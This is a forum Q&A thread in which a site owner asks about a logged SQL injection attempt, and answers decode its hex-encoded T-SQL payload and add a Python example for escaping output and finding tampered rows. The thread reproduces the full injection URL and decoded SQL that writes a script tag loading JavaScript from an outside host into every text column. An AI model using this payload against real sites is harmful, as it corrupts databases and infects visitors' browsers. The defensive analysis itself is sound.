 

Attempted SQL injection attack - what are they trying to do?


I have a public facing website that has been receiving a number of SQL injection attacks over the last few weeks. I exclusively use parameterised stored procedures, so I believe that there have been no successful attacks, but a recent log showed an interesting technique:

Line breaks added for clarity

http://www.mydummysite.uk/mypage.asp?l_surname=Z;DECLARE%20@S%20CHAR(4000);SET @S=CAST(0x
4445434C415245204054207661726368617228323535292C4043207661726368
686172283430303029204445434C415245205461626C655F437572736F7220435552534F
5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F
626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E69
6420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72
20622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970
653D31363729204F50454E205461626C655F437572736F72204645544348204E45585420
46524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528
404046455443485F5354415455533D302920424547494E20657865632827757064617465
205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C
736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F6373
7273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077
6865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73
6372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F637372
73732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854
2046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E442043
4C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43
7572736F72 AS CHAR(4000));EXEC(@S);&_X="

Can anyone shed light on what the "CAST and EXEC" is attempting to do?

Guy asked Oct 14 '08 09:10



2 Answers

Below is the decoded SQL that they were trying to push:

DECLARE @T varchar(255), @C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name, b.name FROM sysobjects a, syscolumns b
  WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  exec('update ['+@T+'] SET ['+@C+']=''"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''+['+@C+'] WHERE '+@C+' NOT like ''%"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Ishmaeel answered Oct 20 '22 03:10


The code, when deciphered from hex into chars, seems to go through all your database tables, select all columns that are of text/char type, and at the end of each value of this type add a malicious script execution from http://www2.s800qn.cn/csrss/w.js. Now if in your website, you have at least one place where you don't escape text data retrieved from your database, your site's users will have this malicious script executed on their machines.

DzinX answered Oct 20 '22 05:10
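The escaping point in this answer is the one that decides whether a tampered column actually hurts visitors, and the cleanup point is what you need once such an UPDATE has run. The script below is an added example, not part of DzinX's answer or the question. The tampered value is constructed to match what the SET expression in the decoded SQL produces (the fragment concatenated with the existing column text); the function names are my own.

```python
"""Keep a stored script fragment inert on output, and locate rows it has reached."""
import html
import re

# The exact fragment the decoded UPDATE writes into every text/char column.
INJECTED_FRAGMENT = '"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--'

# Constructed rows: one column value after the UPDATE ran, one untouched.
TAMPERED_VALUE = INJECTED_FRAGMENT + "Smith"
CLEAN_VALUE = "Smith"


def render_unescaped(value):
    """The unsafe pattern: database text concatenated straight into HTML."""
    return "<title>Search results for " + value + "</title>"


def render_escaped(value):
    """Encode the value for an HTML text context before it reaches the page."""
    return "<title>Search results for " + html.escape(value, quote=True) + "</title>"


SCRIPT_TAG_RE = re.compile(r"<script\b", re.I)


def page_contains_script(markup):
    """True when the produced markup carries a live <script> tag."""
    return bool(SCRIPT_TAG_RE.search(markup))


# Matches the fragment with any script URL, so other hosts are caught as well.
INJECTED_MARKER_RE = re.compile(r'"></title><script src="([^"]+)"></script><!--', re.I)


def find_tampered_rows(rows):
    """Scan (table, column, value) triples and return (table, column, script_url)
    for every value that carries the fragment, so those rows can be cleaned."""
    hits = []
    for table, column, value in rows:
        match = INJECTED_MARKER_RE.search(value or "")
        if match:
            hits.append((table, column, match.group(1)))
    return hits


def strip_injected_marker(value):
    """Remove the fragment and return the original column text."""
    return INJECTED_MARKER_RE.sub("", value)


if __name__ == "__main__":
    print(render_unescaped(TAMPERED_VALUE))   # script tag reaches the browser
    print(render_escaped(TAMPERED_VALUE))     # rendered as harmless text
    rows = [("customers", "surname", TAMPERED_VALUE), ("customers", "surname", CLEAN_VALUE)]
    print(find_tampered_rows(rows))
```

html.escape with quote=True encodes the quote, angle brackets and ampersand, which is enough for an HTML text or attribute context; a value placed inside JavaScript or a URL needs its own encoder. The scan is a Python stand-in for a query over each text column, useful for confirming whether a logged attempt like the one in the question actually wrote anything.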